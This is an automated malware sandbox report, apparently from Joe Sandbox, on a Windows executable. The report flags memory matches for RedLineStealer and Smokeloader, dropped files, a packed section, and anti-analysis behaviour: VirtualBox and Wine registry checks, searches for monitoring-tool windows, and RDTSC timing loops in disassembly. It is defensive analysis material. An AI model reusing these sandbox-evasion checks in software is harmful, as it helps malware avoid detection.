Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D3424 1_2_005D3424
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DF0C2 1_2_005DF0C2
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004880F8 1_2_004880F8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DBC9E 1_2_005DBC9E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005E2576 1_2_005E2576
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005E4117 1_2_005E4117
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CFD32 1_2_005CFD32
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CC92C 1_2_005CC92C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D1923 1_2_005D1923
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00480DE6 1_2_00480DE6
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005451A1 1_2_005451A1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005E0E0A 1_2_005E0E0A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004CAA36 1_2_004CAA36
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D6AC2 1_2_005D6AC2
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005252FE 1_2_005252FE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DD691 1_2_005DD691
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00494298 1_2_00494298
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004BBE93 1_2_004BBE93
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004FBAAA 1_2_004FBAAA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CAEA6 1_2_005CAEA6
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D4F44 1_2_005D4F44
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CE32C 1_2_005CE32C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006F5E56 1_2_006F5E56
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006F5E84 1_2_006F5E84
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006F5E93 1_2_006F5E93
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_049351D7 1_2_049351D7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493EE2E 1_2_0493EE2E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04933FA7 1_2_04933FA7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04945995 1_2_04945995
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_049351D7 1_2_049351D7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493B937 1_2_0493B937
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493F170 1_2_0493F170
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04940BA7 1_2_04940BA7
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0493AA07 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A7A0 appears 35 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644
Source: file.exe, 00000001.00000003.1734839314.000000000526C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000001.00000003.1734619327.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Y-Cleaner.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9951234076433121
Source: file.exe Static PE information: Section: olgpsnjw ZLIB complexity 0.99229768222981
Source: classification engine Classification label: mal100.troj.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 1_2_00402A50
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04788464 CreateToolhelp32Snapshot,Module32First, 1_2_04788464
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 1_2_00401970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4708
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\23RE4w32fN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Command line argument: nosub 1_2_004087E0
Source: C:\Users\user\Desktop\file.exe Command line argument: mixtwo 1_2_004087E0
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Cleaner.lnk.1.dr LNK file: ..\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe
Source: file.exe Static file information: File size 1995776 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: Raw size of olgpsnjw is bigger than: 0x100000 < 0x1a5000

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;olgpsnjw:EW;sccxqdxh:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.1.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: dll[1].1.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Y-Cleaner.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: soft[1].1.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe Static PE information: real checksum: 0x1e843a should be: 0x1f6ecf
Source: Bunifu_UI_v1.5.3.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: olgpsnjw
Source: file.exe Static PE information: section name: sccxqdxh
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040A237 push ecx; ret 1_2_0040A24A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00421B7D push esi; ret 1_2_00421B86
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_1000E891 push ecx; ret 1_2_1000E8A4
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F5497 push ecx; mov dword ptr [esp], esi 1_2_005F8363
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F5497 push edi; mov dword ptr [esp], esp 1_2_005F8367
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F4CB5 push 186079D5h; mov dword ptr [esp], edi 1_2_005F7347
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0060B06B push 1093FA19h; mov dword ptr [esp], edx 1_2_0060B0F1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0060B06B push 466D9CC7h; mov dword ptr [esp], eax 1_2_0060B10E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006D487F push eax; ret 1_2_006D488E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006C687B push 1AB8BC02h; mov dword ptr [esp], edx 1_2_006C6883
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00601846 push 03F8F741h; mov dword ptr [esp], ecx 1_2_00601900
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00601846 push 6842EF4Ah; mov dword ptr [esp], ebx 1_2_0060192F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006B2058 push 68E70CBCh; mov dword ptr [esp], esp 1_2_006B20D4
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0065C05D push esi; mov dword ptr [esp], eax 1_2_0065C0BC
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00690832 push 45CCCACCh; mov dword ptr [esp], esi 1_2_00690865
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00690832 push ecx; mov dword ptr [esp], 55ED2DE4h 1_2_00690883
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00684037 push edi; mov dword ptr [esp], ecx 1_2_00684071
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0067F803 push 69F21E02h; mov dword ptr [esp], ecx 1_2_0067F860
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00651012 push 77CB7FF6h; mov dword ptr [esp], ebp 1_2_0065104B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006C601B push ebx; mov dword ptr [esp], esi 1_2_006C603E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006648CD push 529E7051h; mov dword ptr [esp], esi 1_2_00664904
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006648CD push 366DB9F7h; mov dword ptr [esp], ebx 1_2_00664928
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0068F0D1 push ecx; mov dword ptr [esp], edi 1_2_0068F17A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0065A8AA push edx; mov dword ptr [esp], ecx 1_2_0065A8DB
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0065A8AA push 01276239h; mov dword ptr [esp], ebx 1_2_0065A95B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006ED89C push 301729F5h; mov dword ptr [esp], esi 1_2_006ED8C8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0060309A push 6E37A73Dh; mov dword ptr [esp], ecx 1_2_006030D7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00654973 push eax; mov dword ptr [esp], 4C2A23B8h 1_2_006549B1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006AA94D push 4B1E0A33h; mov dword ptr [esp], ebx 1_2_006AA973
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006BA136 push 49BEE2D7h; mov dword ptr [esp], ebx 1_2_006BA1D9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0066E110 push eax; mov dword ptr [esp], ebx 1_2_0066E131
Source: file.exe Static PE information: section name: entropy: 7.942270007630704
Source: file.exe Static PE information: section name: olgpsnjw entropy: 7.949609738056107
Source: Y-Cleaner.exe.1.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].1.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9EAA second address: 5E9EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9EAE second address: 5E9EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CDE82 second address: 5CDE86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CDE86 second address: 5CDE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CDE8E second address: 5CDE93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92B7 second address: 5E92E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jo 00007FCBA46BC736h 0x0000000b jmp 00007FCBA46BC744h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 jns 00007FCBA46BC742h 0x0000001a jo 00007FCBA46BC736h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9421 second address: 5E9428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9428 second address: 5E942D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9704 second address: 5E9734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCBA4817E7Ch 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007FCBA4817E86h 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9734 second address: 5E973C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E973C second address: 5E9740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC3F0 second address: 5EC49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jmp 00007FCBA46BC744h 0x00000011 popad 0x00000012 nop 0x00000013 add dword ptr [ebp+122D1F8Fh], ebx 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D1C48h], edx 0x00000022 mov dword ptr [ebp+122D1C34h], esi 0x00000028 popad 0x00000029 call 00007FCBA46BC739h 0x0000002e jmp 00007FCBA46BC73Dh 0x00000033 push eax 0x00000034 jnp 00007FCBA46BC748h 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e jnc 00007FCBA46BC751h 0x00000044 pushad 0x00000045 jc 00007FCBA46BC736h 0x0000004b jmp 00007FCBA46BC743h 0x00000050 popad 0x00000051 mov eax, dword ptr [eax] 0x00000053 jnp 00007FCBA46BC73Eh 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d jp 00007FCBA46BC744h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC49A second address: 5EC49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC49E second address: 5EC4C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ch, 76h 0x00000009 push 00000003h 0x0000000b mov si, 8A00h 0x0000000f push 00000000h 0x00000011 cmc 0x00000012 movsx edx, ax 0x00000015 push 00000003h 0x00000017 movzx edi, dx 0x0000001a push A13DCAF6h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4C3 second address: 5EC4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4C9 second address: 5EC4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4CF second address: 5EC4D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
